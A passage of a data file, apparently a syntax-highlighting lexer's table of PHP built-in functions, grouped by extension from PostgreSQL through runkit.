'pg_fetch_result',
'pg_fetch_row',
'pg_field_is_null',
'pg_field_name',
'pg_field_num',
'pg_field_prtlen',
'pg_field_size',
'pg_field_table',
'pg_field_type_oid',
'pg_field_type',
'pg_free_result',
'pg_get_notify',
'pg_get_pid',
'pg_get_result',
'pg_host',
'pg_insert',
'pg_last_error',
'pg_last_notice',
'pg_last_oid',
'pg_lo_close',
'pg_lo_create',
'pg_lo_export',
'pg_lo_import',
'pg_lo_open',
'pg_lo_read_all',
'pg_lo_read',
'pg_lo_seek',
'pg_lo_tell',
'pg_lo_truncate',
'pg_lo_unlink',
'pg_lo_write',
'pg_meta_data',
'pg_num_fields',
'pg_num_rows',
'pg_options',
'pg_parameter_status',
'pg_pconnect',
'pg_ping',
'pg_port',
'pg_prepare',
'pg_put_line',
'pg_query_params',
'pg_query',
'pg_result_error_field',
'pg_result_error',
'pg_result_seek',
'pg_result_status',
'pg_select',
'pg_send_execute',
'pg_send_prepare',
'pg_send_query_params',
'pg_send_query',
'pg_set_client_encoding',
'pg_set_error_verbosity',
'pg_trace',
'pg_transaction_status',
'pg_tty',
'pg_unescape_bytea',
'pg_untrace',
'pg_update',
'pg_version'],
'Printer': ['printer_abort',
'printer_close',
'printer_create_brush',
'printer_create_dc',
'printer_create_font',
'printer_create_pen',
'printer_delete_brush',
'printer_delete_dc',
'printer_delete_font',
'printer_delete_pen',
'printer_draw_bmp',
'printer_draw_chord',
'printer_draw_elipse',
'printer_draw_line',
'printer_draw_pie',
'printer_draw_rectangle',
'printer_draw_roundrect',
'printer_draw_text',
'printer_end_doc',
'printer_end_page',
'printer_get_option',
'printer_list',
'printer_logical_fontheight',
'printer_open',
'printer_select_brush',
'printer_select_font',
'printer_select_pen',
'printer_set_option',
'printer_start_doc',
'printer_start_page',
'printer_write'],
'Proctitle': ['setproctitle', 'setthreadtitle'],
'Program execution': ['escapeshellarg',
'escapeshellcmd',
'exec',
'passthru',
'proc_close',
'proc_get_status',
'proc_nice',
'proc_open',
'proc_terminate',
'shell_exec',
'system'],
'Pspell': ['pspell_add_to_personal',
'pspell_add_to_session',
'pspell_check',
'pspell_clear_session',
'pspell_config_create',
'pspell_config_data_dir',
'pspell_config_dict_dir',
'pspell_config_ignore',
'pspell_config_mode',
'pspell_config_personal',
'pspell_config_repl',
'pspell_config_runtogether',
'pspell_config_save_repl',
'pspell_new_config',
'pspell_new_personal',
'pspell_new',
'pspell_save_wordlist',
'pspell_store_replacement',
'pspell_suggest'],
'RPM Reader': ['rpm_close',
'rpm_get_tag',
'rpm_is_valid',
'rpm_open',
'rpm_version'],
'RRD': ['rrd_create',
'rrd_error',
'rrd_fetch',
'rrd_first',
'rrd_graph',
'rrd_info',
'rrd_last',
'rrd_lastupdate',
'rrd_restore',
'rrd_tune',
'rrd_update',
'rrd_version',
'rrd_xport',
'rrdc_disconnect'],
'Radius': ['radius_acct_open',
'radius_add_server',
'radius_auth_open',
'radius_close',
'radius_config',
'radius_create_request',
'radius_cvt_addr',
'radius_cvt_int',
'radius_cvt_string',
'radius_demangle_mppe_key',
'radius_demangle',
'radius_get_attr',
'radius_get_tagged_attr_data',
'radius_get_tagged_attr_tag',
'radius_get_vendor_attr',
'radius_put_addr',
'radius_put_attr',
'radius_put_int',
'radius_put_string',
'radius_put_vendor_addr',
'radius_put_vendor_attr',
'radius_put_vendor_int',
'radius_put_vendor_string',
'radius_request_authenticator',
'radius_salt_encrypt_attr',
'radius_send_request',
'radius_server_secret',
'radius_strerror'],
'Rar': ['rar_wrapper_cache_stats'],
'Readline': ['readline_add_history',
'readline_callback_handler_install',
'readline_callback_handler_remove',
'readline_callback_read_char',
'readline_clear_history',
'readline_completion_function',
'readline_info',
'readline_list_history',
'readline_on_new_line',
'readline_read_history',
'readline_redisplay',
'readline_write_history',
'readline'],
'Recode': ['recode_file', 'recode_string', 'recode'],
'SNMP': ['snmp_get_quick_print',
'snmp_get_valueretrieval',
'snmp_read_mib',
'snmp_set_enum_print',
'snmp_set_oid_numeric_print',
'snmp_set_oid_output_format',
'snmp_set_quick_print',
'snmp_set_valueretrieval',
'snmp2_get',
'snmp2_getnext',
'snmp2_real_walk',
'snmp2_set',
'snmp2_walk',
'snmp3_get',
'snmp3_getnext',
'snmp3_real_walk',
'snmp3_set',
'snmp3_walk',
'snmpget',
'snmpgetnext',
'snmprealwalk',
'snmpset',
'snmpwalk',
'snmpwalkoid'],
'SOAP': ['is_soap_fault', 'use_soap_error_handler'],
'SPL': ['class_implements',
'class_parents',
'class_uses',
'iterator_apply',
'iterator_count',
'iterator_to_array',
'spl_autoload_call',
'spl_autoload_extensions',
'spl_autoload_functions',
'spl_autoload_register',
'spl_autoload_unregister',
'spl_autoload',
'spl_classes',
'spl_object_hash'],
'SPPLUS': ['calcul_hmac', 'calculhmac', 'nthmac', 'signeurlpaiement'],
'SQLSRV': ['sqlsrv_begin_transaction',
'sqlsrv_cancel',
'sqlsrv_client_info',
'sqlsrv_close',
'sqlsrv_commit',
'sqlsrv_configure',
'sqlsrv_connect',
'sqlsrv_errors',
'sqlsrv_execute',
'sqlsrv_fetch_array',
'sqlsrv_fetch_object',
'sqlsrv_fetch',
'sqlsrv_field_metadata',
'sqlsrv_free_stmt',
'sqlsrv_get_config',
'sqlsrv_get_field',
'sqlsrv_has_rows',
'sqlsrv_next_result',
'sqlsrv_num_fields',
'sqlsrv_num_rows',
'sqlsrv_prepare',
'sqlsrv_query',
'sqlsrv_rollback',
'sqlsrv_rows_affected',
'sqlsrv_send_stream_data',
'sqlsrv_server_info'],
'SQLite': ['sqlite_array_query',
'sqlite_busy_timeout',
'sqlite_changes',
'sqlite_close',
'sqlite_column',
'sqlite_create_aggregate',
'sqlite_create_function',
'sqlite_current',
'sqlite_error_string',
'sqlite_escape_string',
'sqlite_exec',
'sqlite_factory',
'sqlite_fetch_all',
'sqlite_fetch_array',
'sqlite_fetch_column_types',
'sqlite_fetch_object',
'sqlite_fetch_single',
'sqlite_fetch_string',
'sqlite_field_name',
'sqlite_has_more',
'sqlite_has_prev',
'sqlite_key',
'sqlite_last_error',
'sqlite_last_insert_rowid',
'sqlite_libencoding',
'sqlite_libversion',
'sqlite_next',
'sqlite_num_fields',
'sqlite_num_rows',
'sqlite_open',
'sqlite_popen',
'sqlite_prev',
'sqlite_query',
'sqlite_rewind',
'sqlite_seek',
'sqlite_single_query',
'sqlite_udf_decode_binary',
'sqlite_udf_encode_binary',
'sqlite_unbuffered_query',
'sqlite_valid'],
'SSH2': ['ssh2_auth_agent',
'ssh2_auth_hostbased_file',
'ssh2_auth_none',
'ssh2_auth_password',
'ssh2_auth_pubkey_file',
'ssh2_connect',
'ssh2_exec',
'ssh2_fetch_stream',
'ssh2_fingerprint',
'ssh2_methods_negotiated',
'ssh2_publickey_add',
'ssh2_publickey_init',
'ssh2_publickey_list',
'ssh2_publickey_remove',
'ssh2_scp_recv',
'ssh2_scp_send',
'ssh2_sftp_chmod',
'ssh2_sftp_lstat',
'ssh2_sftp_mkdir',
'ssh2_sftp_readlink',
'ssh2_sftp_realpath',
'ssh2_sftp_rename',
'ssh2_sftp_rmdir',
'ssh2_sftp_stat',
'ssh2_sftp_symlink',
'ssh2_sftp_unlink',
'ssh2_sftp',
'ssh2_shell',
'ssh2_tunnel'],
'SVN': ['svn_add',
'svn_auth_get_parameter',
'svn_auth_set_parameter',
'svn_blame',
'svn_cat',
'svn_checkout',
'svn_cleanup',
'svn_client_version',
'svn_commit',
'svn_delete',
'svn_diff',
'svn_export',
'svn_fs_abort_txn',
'svn_fs_apply_text',
'svn_fs_begin_txn2',
'svn_fs_change_node_prop',
'svn_fs_check_path',
'svn_fs_contents_changed',
'svn_fs_copy',
'svn_fs_delete',
'svn_fs_dir_entries',
'svn_fs_file_contents',
'svn_fs_file_length',
'svn_fs_is_dir',
'svn_fs_is_file',
'svn_fs_make_dir',
'svn_fs_make_file',
'svn_fs_node_created_rev',
'svn_fs_node_prop',
'svn_fs_props_changed',
'svn_fs_revision_prop',
'svn_fs_revision_root',
'svn_fs_txn_root',
'svn_fs_youngest_rev',
'svn_import',
'svn_log',
'svn_ls',
'svn_mkdir',
'svn_repos_create',
'svn_repos_fs_begin_txn_for_commit',
'svn_repos_fs_commit_txn',
'svn_repos_fs',
'svn_repos_hotcopy',
'svn_repos_open',
'svn_repos_recover',
'svn_revert',
'svn_status',
'svn_update'],
'SWF': ['swf_actiongeturl',
'swf_actiongotoframe',
'swf_actiongotolabel',
'swf_actionnextframe',
'swf_actionplay',
'swf_actionprevframe',
'swf_actionsettarget',
'swf_actionstop',
'swf_actiontogglequality',
'swf_actionwaitforframe',
'swf_addbuttonrecord',
'swf_addcolor',
'swf_closefile',
'swf_definebitmap',
'swf_definefont',
'swf_defineline',
'swf_definepoly',
'swf_definerect',
'swf_definetext',
'swf_endbutton',
'swf_enddoaction',
'swf_endshape',
'swf_endsymbol',
'swf_fontsize',
'swf_fontslant',
'swf_fonttracking',
'swf_getbitmapinfo',
'swf_getfontinfo',
'swf_getframe',
'swf_labelframe',
'swf_lookat',
'swf_modifyobject',
'swf_mulcolor',
'swf_nextid',
'swf_oncondition',
'swf_openfile',
'swf_ortho2',
'swf_ortho',
'swf_perspective',
'swf_placeobject',
'swf_polarview',
'swf_popmatrix',
'swf_posround',
'swf_pushmatrix',
'swf_removeobject',
'swf_rotate',
'swf_scale',
'swf_setfont',
'swf_setframe',
'swf_shapearc',
'swf_shapecurveto3',
'swf_shapecurveto',
'swf_shapefillbitmapclip',
'swf_shapefillbitmaptile',
'swf_shapefilloff',
'swf_shapefillsolid',
'swf_shapelinesolid',
'swf_shapelineto',
'swf_shapemoveto',
'swf_showframe',
'swf_startbutton',
'swf_startdoaction',
'swf_startshape',
'swf_startsymbol',
'swf_textwidth',
'swf_translate',
'swf_viewport'],
'Semaphore': ['ftok',
'msg_get_queue',
'msg_queue_exists',
'msg_receive',
'msg_remove_queue',
'msg_send',
'msg_set_queue',
'msg_stat_queue',
'sem_acquire',
'sem_get',
'sem_release',
'sem_remove',
'shm_attach',
'shm_detach',
'shm_get_var',
'shm_has_var',
'shm_put_var',
'shm_remove_var',
'shm_remove'],
'Session': ['session_cache_expire',
'session_cache_limiter',
'session_commit',
'session_decode',
'session_destroy',
'session_encode',
'session_get_cookie_params',
'session_id',
'session_is_registered',
'session_module_name',
'session_name',
'session_regenerate_id',
'session_register_shutdown',
'session_register',
'session_save_path',
'session_set_cookie_params',
'session_set_save_handler',
'session_start',
'session_status',
'session_unregister',
'session_unset',
'session_write_close'],
'Session PgSQL': ['session_pgsql_add_error',
'session_pgsql_get_error',
'session_pgsql_get_field',
'session_pgsql_reset',
'session_pgsql_set_field',
'session_pgsql_status'],
'Shared Memory': ['shmop_close',
'shmop_delete',
'shmop_open',
'shmop_read',
'shmop_size',
'shmop_write'],
'SimpleXML': ['simplexml_import_dom',
'simplexml_load_file',
'simplexml_load_string'],
'Socket': ['socket_accept',
'socket_bind',
'socket_clear_error',
'socket_close',
'socket_cmsg_space',
'socket_connect',
'socket_create_listen',
'socket_create_pair',
'socket_create',
'socket_get_option',
'socket_getpeername',
'socket_getsockname',
'socket_import_stream',
'socket_last_error',
'socket_listen',
'socket_read',
'socket_recv',
'socket_recvfrom',
'socket_recvmsg',
'socket_select',
'socket_send',
'socket_sendmsg',
'socket_sendto',
'socket_set_block',
'socket_set_nonblock',
'socket_set_option',
'socket_shutdown',
'socket_strerror',
'socket_write'],
'Solr': ['solr_get_version'],
'Statistic': ['stats_absolute_deviation',
'stats_cdf_beta',
'stats_cdf_binomial',
'stats_cdf_cauchy',
'stats_cdf_chisquare',
'stats_cdf_exponential',
'stats_cdf_f',
'stats_cdf_gamma',
'stats_cdf_laplace',
'stats_cdf_logistic',
'stats_cdf_negative_binomial',
'stats_cdf_noncentral_chisquare',
'stats_cdf_noncentral_f',
'stats_cdf_poisson',
'stats_cdf_t',
'stats_cdf_uniform',
'stats_cdf_weibull',
'stats_covariance',
'stats_den_uniform',
'stats_dens_beta',
'stats_dens_cauchy',
'stats_dens_chisquare',
'stats_dens_exponential',
'stats_dens_f',
'stats_dens_gamma',
'stats_dens_laplace',
'stats_dens_logistic',
'stats_dens_negative_binomial',
'stats_dens_normal',
'stats_dens_pmf_binomial',
'stats_dens_pmf_hypergeometric',
'stats_dens_pmf_poisson',
'stats_dens_t',
'stats_dens_weibull',
'stats_harmonic_mean',
'stats_kurtosis',
'stats_rand_gen_beta',
'stats_rand_gen_chisquare',
'stats_rand_gen_exponential',
'stats_rand_gen_f',
'stats_rand_gen_funiform',
'stats_rand_gen_gamma',
'stats_rand_gen_ibinomial_negative',
'stats_rand_gen_ibinomial',
'stats_rand_gen_int',
'stats_rand_gen_ipoisson',
'stats_rand_gen_iuniform',
'stats_rand_gen_noncenral_chisquare',
'stats_rand_gen_noncentral_f',
'stats_rand_gen_noncentral_t',
'stats_rand_gen_normal',
'stats_rand_gen_t',
'stats_rand_get_seeds',
'stats_rand_phrase_to_seeds',
'stats_rand_ranf',
'stats_rand_setall',
'stats_skew',
'stats_standard_deviation',
'stats_stat_binomial_coef',
'stats_stat_correlation',
'stats_stat_gennch',
'stats_stat_independent_t',
'stats_stat_innerproduct',
'stats_stat_noncentral_t',
'stats_stat_paired_t',
'stats_stat_percentile',
'stats_stat_powersum',
'stats_variance'],
'Stomp': ['stomp_connect_error', 'stomp_version'],
'Stream': ['set_socket_blocking',
'stream_bucket_append',
'stream_bucket_make_writeable',
'stream_bucket_new',
'stream_bucket_prepend',
'stream_context_create',
'stream_context_get_default',
'stream_context_get_options',
'stream_context_get_params',
'stream_context_set_default',
'stream_context_set_option',
'stream_context_set_params',
'stream_copy_to_stream',
'stream_encoding',
'stream_filter_append',
'stream_filter_prepend',
'stream_filter_register',
'stream_filter_remove',
'stream_get_contents',
'stream_get_filters',
'stream_get_line',
'stream_get_meta_data',
'stream_get_transports',
'stream_get_wrappers',
'stream_is_local',
'stream_notification_callback',
'stream_register_wrapper',
'stream_resolve_include_path',
'stream_select',
'stream_set_blocking',
'stream_set_chunk_size',
'stream_set_read_buffer',
'stream_set_timeout',
'stream_set_write_buffer',
'stream_socket_accept',
'stream_socket_client',
'stream_socket_enable_crypto',
'stream_socket_get_name',
'stream_socket_pair',
'stream_socket_recvfrom',
'stream_socket_sendto',
'stream_socket_server',
'stream_socket_shutdown',
'stream_supports_lock',
'stream_wrapper_register',
'stream_wrapper_restore',
'stream_wrapper_unregister'],
'String': ['addcslashes',
'addslashes',
'bin2hex',
'chop',
'chr',
'chunk_split',
'convert_cyr_string',
'convert_uudecode',
'convert_uuencode',
'count_chars',
'crc32',
'crypt',
'echo',
'explode',
'fprintf',
'get_html_translation_table',
'hebrev',
'hebrevc',
'hex2bin',
'html_entity_decode',
'htmlentities',
'htmlspecialchars_decode',
'htmlspecialchars',
'implode',
'join',
'lcfirst',
'levenshtein',
'localeconv',
'ltrim',
'md5_file',
'md5',
'metaphone',
'money_format',
'nl_langinfo',
'nl2br',
'number_format',
'ord',
'parse_str',
'print',
'printf',
'quoted_printable_decode',
'quoted_printable_encode',
'quotemeta',
'rtrim',
'setlocale',
'sha1_file',
'sha1',
'similar_text',
'soundex',
'sprintf',
'sscanf',
'str_getcsv',
'str_ireplace',
'str_pad',
'str_repeat',
'str_replace',
'str_rot13',
'str_shuffle',
'str_split',
'str_word_count',
'strcasecmp',
'strchr',
'strcmp',
'strcoll',
'strcspn',
'strip_tags',
'stripcslashes',
'stripos',
'stripslashes',
'stristr',
'strlen',
'strnatcasecmp',
'strnatcmp',
'strncasecmp',
'strncmp',
'strpbrk',
'strpos',
'strrchr',
'strrev',
'strripos',
'strrpos',
'strspn',
'strstr',
'strtok',
'strtolower',
'strtoupper',
'strtr',
'substr_compare',
'substr_count',
'substr_replace',
'substr',
'trim',
'ucfirst',
'ucwords',
'vfprintf',
'vprintf',
'vsprintf',
'wordwrap'],
'Sybase': ['sybase_affected_rows',
'sybase_close',
'sybase_connect',
'sybase_data_seek',
'sybase_deadlock_retry_count',
'sybase_fetch_array',
'sybase_fetch_assoc',
'sybase_fetch_field',
'sybase_fetch_object',
'sybase_fetch_row',
'sybase_field_seek',
'sybase_free_result',
'sybase_get_last_message',
'sybase_min_client_severity',
'sybase_min_error_severity',
'sybase_min_message_severity',
'sybase_min_server_severity',
'sybase_num_fields',
'sybase_num_rows',
'sybase_pconnect',
'sybase_query',
'sybase_result',
'sybase_select_db',
'sybase_set_message_handler',
'sybase_unbuffered_query'],
'TCP': ['tcpwrap_check'],
'Taint': ['is_tainted', 'taint', 'untaint'],
'Tidy': ['ob_tidyhandler',
'tidy_access_count',
'tidy_config_count',
'tidy_error_count',
'tidy_get_output',
'tidy_load_config',
'tidy_reset_config',
'tidy_save_config',
'tidy_set_encoding',
'tidy_setopt',
'tidy_warning_count'],
'Tokenizer': ['token_get_all', 'token_name'],
'Trader': ['trader_acos',
'trader_ad',
'trader_add',
'trader_adosc',
'trader_adx',
'trader_adxr',
'trader_apo',
'trader_aroon',
'trader_aroonosc',
'trader_asin',
'trader_atan',
'trader_atr',
'trader_avgprice',
'trader_bbands',
'trader_beta',
'trader_bop',
'trader_cci',
'trader_cdl2crows',
'trader_cdl3blackcrows',
'trader_cdl3inside',
'trader_cdl3linestrike',
'trader_cdl3outside',
'trader_cdl3starsinsouth',
'trader_cdl3whitesoldiers',
'trader_cdlabandonedbaby',
'trader_cdladvanceblock',
'trader_cdlbelthold',
'trader_cdlbreakaway',
'trader_cdlclosingmarubozu',
'trader_cdlconcealbabyswall',
'trader_cdlcounterattack',
'trader_cdldarkcloudcover',
'trader_cdldoji',
'trader_cdldojistar',
'trader_cdldragonflydoji',
'trader_cdlengulfing',
'trader_cdleveningdojistar',
'trader_cdleveningstar',
'trader_cdlgapsidesidewhite',
'trader_cdlgravestonedoji',
'trader_cdlhammer',
'trader_cdlhangingman',
'trader_cdlharami',
'trader_cdlharamicross',
'trader_cdlhighwave',
'trader_cdlhikkake',
'trader_cdlhikkakemod',
'trader_cdlhomingpigeon',
'trader_cdlidentical3crows',
'trader_cdlinneck',
'trader_cdlinvertedhammer',
'trader_cdlkicking',
'trader_cdlkickingbylength',
'trader_cdlladderbottom',
'trader_cdllongleggeddoji',
'trader_cdllongline',
'trader_cdlmarubozu',
'trader_cdlmatchinglow',
'trader_cdlmathold',
'trader_cdlmorningdojistar',
'trader_cdlmorningstar',
'trader_cdlonneck',
'trader_cdlpiercing',
'trader_cdlrickshawman',
'trader_cdlrisefall3methods',
'trader_cdlseparatinglines',
'trader_cdlshootingstar',
'trader_cdlshortline',
'trader_cdlspinningtop',
'trader_cdlstalledpattern',
'trader_cdlsticksandwich',
'trader_cdltakuri',
'trader_cdltasukigap',
'trader_cdlthrusting',
'trader_cdltristar',
'trader_cdlunique3river',
'trader_cdlupsidegap2crows',
'trader_cdlxsidegap3methods',
'trader_ceil',
'trader_cmo',
'trader_correl',
'trader_cos',
'trader_cosh',
'trader_dema',
'trader_div',
'trader_dx',
'trader_ema',
'trader_errno',
'trader_exp',
'trader_floor',
'trader_get_compat',
'trader_get_unstable_period',
'trader_ht_dcperiod',
'trader_ht_dcphase',
'trader_ht_phasor',
'trader_ht_sine',
'trader_ht_trendline',
'trader_ht_trendmode',
'trader_kama',
'trader_linearreg_angle',
'trader_linearreg_intercept',
'trader_linearreg_slope',
'trader_linearreg',
'trader_ln',
'trader_log10',
'trader_ma',
'trader_macd',
'trader_macdext',
'trader_macdfix',
'trader_mama',
'trader_mavp',
'trader_max',
'trader_maxindex',
'trader_medprice',
'trader_mfi',
'trader_midpoint',
'trader_midprice',
'trader_min',
'trader_minindex',
'trader_minmax',
'trader_minmaxindex',
'trader_minus_di',
'trader_minus_dm',
'trader_mom',
'trader_mult',
'trader_natr',
'trader_obv',
'trader_plus_di',
'trader_plus_dm',
'trader_ppo',
'trader_roc',
'trader_rocp',
'trader_rocr100',
'trader_rocr',
'trader_rsi',
'trader_sar',
'trader_sarext',
'trader_set_compat',
'trader_set_unstable_period',
'trader_sin',
'trader_sinh',
'trader_sma',
'trader_sqrt',
'trader_stddev',
'trader_stoch',
'trader_stochf',
'trader_stochrsi',
'trader_sub',
'trader_sum',
'trader_t3',
'trader_tan',
'trader_tanh',
'trader_tema',
'trader_trange',
'trader_trima',
'trader_trix',
'trader_tsf',
'trader_typprice',
'trader_ultosc',
'trader_var',
'trader_wclprice',
'trader_willr',
'trader_wma'],
'URL': ['base64_decode',
'base64_encode',
'get_headers',
'get_meta_tags',
'http_build_query',
'parse_url',
'rawurldecode',
'rawurlencode',
'urldecode',
'urlencode'],
'Uopz': ['uopz_backup',
'uopz_compose',
'uopz_copy',
'uopz_delete',
'uopz_extend',
'uopz_flags',
'uopz_function',
'uopz_implement',
'uopz_overload',
'uopz_redefine',
'uopz_rename',
'uopz_restore',
'uopz_undefine'],
'Variable handling': ['boolval',
'debug_zval_dump',
'doubleval',
'empty',
'floatval',
'get_defined_vars',
'get_resource_type',
'gettype',
'import_request_variables',
'intval',
'is_array',
'is_bool',
'is_callable',
'is_double',
'is_float',
'is_int',
'is_integer',
'is_long',
'is_null',
'is_numeric',
'is_object',
'is_real',
'is_resource',
'is_scalar',
'is_string',
'isset',
'print_r',
'serialize',
'settype',
'strval',
'unserialize',
'unset',
'var_dump',
'var_export'],
'W32api': ['w32api_deftype',
'w32api_init_dtype',
'w32api_invoke_function',
'w32api_register_function',
'w32api_set_call_method'],
'WDDX': ['wddx_add_vars',
'wddx_deserialize',
'wddx_packet_end',
'wddx_packet_start',
'wddx_serialize_value',
'wddx_serialize_vars'],
'WinCache': ['wincache_fcache_fileinfo',
'wincache_fcache_meminfo',
'wincache_lock',
'wincache_ocache_fileinfo',
'wincache_ocache_meminfo',
'wincache_refresh_if_changed',
'wincache_rplist_fileinfo',
'wincache_rplist_meminfo',
'wincache_scache_info',
'wincache_scache_meminfo',
'wincache_ucache_add',
'wincache_ucache_cas',
'wincache_ucache_clear',
'wincache_ucache_dec',
'wincache_ucache_delete',
'wincache_ucache_exists',
'wincache_ucache_get',
'wincache_ucache_inc',
'wincache_ucache_info',
'wincache_ucache_meminfo',
'wincache_ucache_set',
'wincache_unlock'],
'XML Parser': ['utf8_decode',
'utf8_encode',
'xml_error_string',
'xml_get_current_byte_index',
'xml_get_current_column_number',
'xml_get_current_line_number',
'xml_get_error_code',
'xml_parse_into_struct',
'xml_parse',
'xml_parser_create_ns',
'xml_parser_create',
'xml_parser_free',
'xml_parser_get_option',
'xml_parser_set_option',
'xml_set_character_data_handler',
'xml_set_default_handler',
'xml_set_element_handler',
'xml_set_end_namespace_decl_handler',
'xml_set_external_entity_ref_handler',
'xml_set_notation_decl_handler',
'xml_set_object',
'xml_set_processing_instruction_handler',
'xml_set_start_namespace_decl_handler',
'xml_set_unparsed_entity_decl_handler'],
'XML-RPC': ['xmlrpc_decode_request',
'xmlrpc_decode',
'xmlrpc_encode_request',
'xmlrpc_encode',
'xmlrpc_get_type',
'xmlrpc_is_fault',
'xmlrpc_parse_method_descriptions',
'xmlrpc_server_add_introspection_data',
'xmlrpc_server_call_method',
'xmlrpc_server_create',
'xmlrpc_server_destroy',
'xmlrpc_server_register_introspection_callback',
'xmlrpc_server_register_method',
'xmlrpc_set_type'],
'XSLT (PHP 4)': ['xslt_backend_info',
'xslt_backend_name',
'xslt_backend_version',
'xslt_create',
'xslt_errno',
'xslt_error',
'xslt_free',
'xslt_getopt',
'xslt_process',
'xslt_set_base',
'xslt_set_encoding',
'xslt_set_error_handler',
'xslt_set_log',
'xslt_set_object',
'xslt_set_sax_handler',
'xslt_set_sax_handlers',
'xslt_set_scheme_handler',
'xslt_set_scheme_handlers',
'xslt_setopt'],
'Xhprof': ['xhprof_disable',
'xhprof_enable',
'xhprof_sample_disable',
'xhprof_sample_enable'],
'YAZ': ['yaz_addinfo',
'yaz_ccl_conf',
'yaz_ccl_parse',
'yaz_close',
'yaz_connect',
'yaz_database',
'yaz_element',
'yaz_errno',
'yaz_error',
'yaz_es_result',
'yaz_es',
'yaz_get_option',
'yaz_hits',
'yaz_itemorder',
'yaz_present',
'yaz_range',
'yaz_record',
'yaz_scan_result',
'yaz_scan',
'yaz_schema',
'yaz_search',
'yaz_set_option',
'yaz_sort',
'yaz_syntax',
'yaz_wait'],
'YP/NIS': ['yp_all',
'yp_cat',
'yp_err_string',
'yp_errno',
'yp_first',
'yp_get_default_domain',
'yp_master',
'yp_match',
'yp_next',
'yp_order'],
'Yaml': ['yaml_emit_file',
'yaml_emit',
'yaml_parse_file',
'yaml_parse_url',
'yaml_parse'],
'Zip': ['zip_close',
'zip_entry_close',
'zip_entry_compressedsize',
'zip_entry_compressionmethod',
'zip_entry_filesize',
'zip_entry_name',
'zip_entry_open',
'zip_entry_read',
'zip_open',
'zip_read'],
'Zlib': ['gzclose',
'gzcompress',
'gzdecode',
'gzdeflate',
'gzencode',
'gzeof',
'gzfile',
'gzgetc',
'gzgets',
'gzgetss',
'gzinflate',
'gzopen',
'gzpassthru',
'gzputs',
'gzread',
'gzrewind',
'gzseek',
'gztell',
'gzuncompress',
'gzwrite',
'readgzfile',
'zlib_decode',
'zlib_encode',
'zlib_get_coding_type'],
'bcompiler': ['bcompiler_load_exe',
'bcompiler_load',
'bcompiler_parse_class',
'bcompiler_read',
'bcompiler_write_class',
'bcompiler_write_constant',
'bcompiler_write_exe_footer',
'bcompiler_write_file',
'bcompiler_write_footer',
'bcompiler_write_function',
'bcompiler_write_functions_from_file',
'bcompiler_write_header',
'bcompiler_write_included_filename'],
'cURL': ['curl_close',
'curl_copy_handle',
'curl_errno',
'curl_error',
'curl_escape',
'curl_exec',
'curl_file_create',
'curl_getinfo',
'curl_init',
'curl_multi_add_handle',
'curl_multi_close',
'curl_multi_exec',
'curl_multi_getcontent',
'curl_multi_info_read',
'curl_multi_init',
'curl_multi_remove_handle',
'curl_multi_select',
'curl_multi_setopt',
'curl_multi_strerror',
'curl_pause',
'curl_reset',
'curl_setopt_array',
'curl_setopt',
'curl_share_close',
'curl_share_init',
'curl_share_setopt',
'curl_strerror',
'curl_unescape',
'curl_version'],
'chdb': ['chdb_create'],
'dBase': ['dbase_add_record',
'dbase_close',
'dbase_create',
'dbase_delete_record',
'dbase_get_header_info',
'dbase_get_record_with_names',
'dbase_get_record',
'dbase_numfields',
'dbase_numrecords',
'dbase_open',
'dbase_pack',
'dbase_replace_record'],
'dbx': ['dbx_close',
'dbx_compare',
'dbx_connect',
'dbx_error',
'dbx_escape_string',
'dbx_fetch_row',
'dbx_query',
'dbx_sort'],
'filePro': ['filepro_fieldcount',
'filepro_fieldname',
'filepro_fieldtype',
'filepro_fieldwidth',
'filepro_retrieve',
'filepro_rowcount',
'filepro'],
'iconv': ['iconv_get_encoding',
'iconv_mime_decode_headers',
'iconv_mime_decode',
'iconv_mime_encode',
'iconv_set_encoding',
'iconv_strlen',
'iconv_strpos',
'iconv_strrpos',
'iconv_substr',
'iconv',
'ob_iconv_handler'],
'inclued': ['inclued_get_data'],
'intl': ['intl_error_name',
'intl_get_error_code',
'intl_get_error_message',
'intl_is_failure'],
'libxml': ['libxml_clear_errors',
'libxml_disable_entity_loader',
'libxml_get_errors',
'libxml_get_last_error',
'libxml_set_external_entity_loader',
'libxml_set_streams_context',
'libxml_use_internal_errors'],
'mSQL': ['msql_affected_rows',
'msql_close',
'msql_connect',
'msql_create_db',
'msql_createdb',
'msql_data_seek',
'msql_db_query',
'msql_dbname',
'msql_drop_db',
'msql_error',
'msql_fetch_array',
'msql_fetch_field',
'msql_fetch_object',
'msql_fetch_row',
'msql_field_flags',
'msql_field_len',
'msql_field_name',
'msql_field_seek',
'msql_field_table',
'msql_field_type',
'msql_fieldflags',
'msql_fieldlen',
'msql_fieldname',
'msql_fieldtable',
'msql_fieldtype',
'msql_free_result',
'msql_list_dbs',
'msql_list_fields',
'msql_list_tables',
'msql_num_fields',
'msql_num_rows',
'msql_numfields',
'msql_numrows',
'msql_pconnect',
'msql_query',
'msql_regcase',
'msql_result',
'msql_select_db',
'msql_tablename',
'msql'],
'mnoGoSearch': ['udm_add_search_limit',
'udm_alloc_agent_array',
'udm_alloc_agent',
'udm_api_version',
'udm_cat_list',
'udm_cat_path',
'udm_check_charset',
'udm_check_stored',
'udm_clear_search_limits',
'udm_close_stored',
'udm_crc32',
'udm_errno',
'udm_error',
'udm_find',
'udm_free_agent',
'udm_free_ispell_data',
'udm_free_res',
'udm_get_doc_count',
'udm_get_res_field',
'udm_get_res_param',
'udm_hash32',
'udm_load_ispell_data',
'udm_open_stored',
'udm_set_agent_param'],
'mqseries': ['mqseries_back',
'mqseries_begin',
'mqseries_close',
'mqseries_cmit',
'mqseries_conn',
'mqseries_connx',
'mqseries_disc',
'mqseries_get',
'mqseries_inq',
'mqseries_open',
'mqseries_put1',
'mqseries_put',
'mqseries_set',
'mqseries_strerror'],
'mysqlnd_qc': ['mysqlnd_qc_clear_cache',
'mysqlnd_qc_get_available_handlers',
'mysqlnd_qc_get_cache_info',
'mysqlnd_qc_get_core_stats',
'mysqlnd_qc_get_normalized_query_trace_log',
'mysqlnd_qc_get_query_trace_log',
'mysqlnd_qc_set_cache_condition',
'mysqlnd_qc_set_is_select',
'mysqlnd_qc_set_storage_handler',
'mysqlnd_qc_set_user_handlers'],
'qtdom': ['qdom_error', 'qdom_tree'],
'runkit': ['runkit_class_adopt',
'runkit_class_emancipate',
'runkit_constant_add',
'runkit_constant_redefine',
'runkit_constant_remove',
'runkit_function_add',
'runkit_function_copy',
'runkit_function_redefine',
'runkit_function_remove',
'runkit_function_rename',
'runkit_import',
'runkit_lint_file',
'runkit_lint',
'runkit_method_add',
'runkit_method_copy',
'runkit_method_redefine',
'runkit_method_remove',
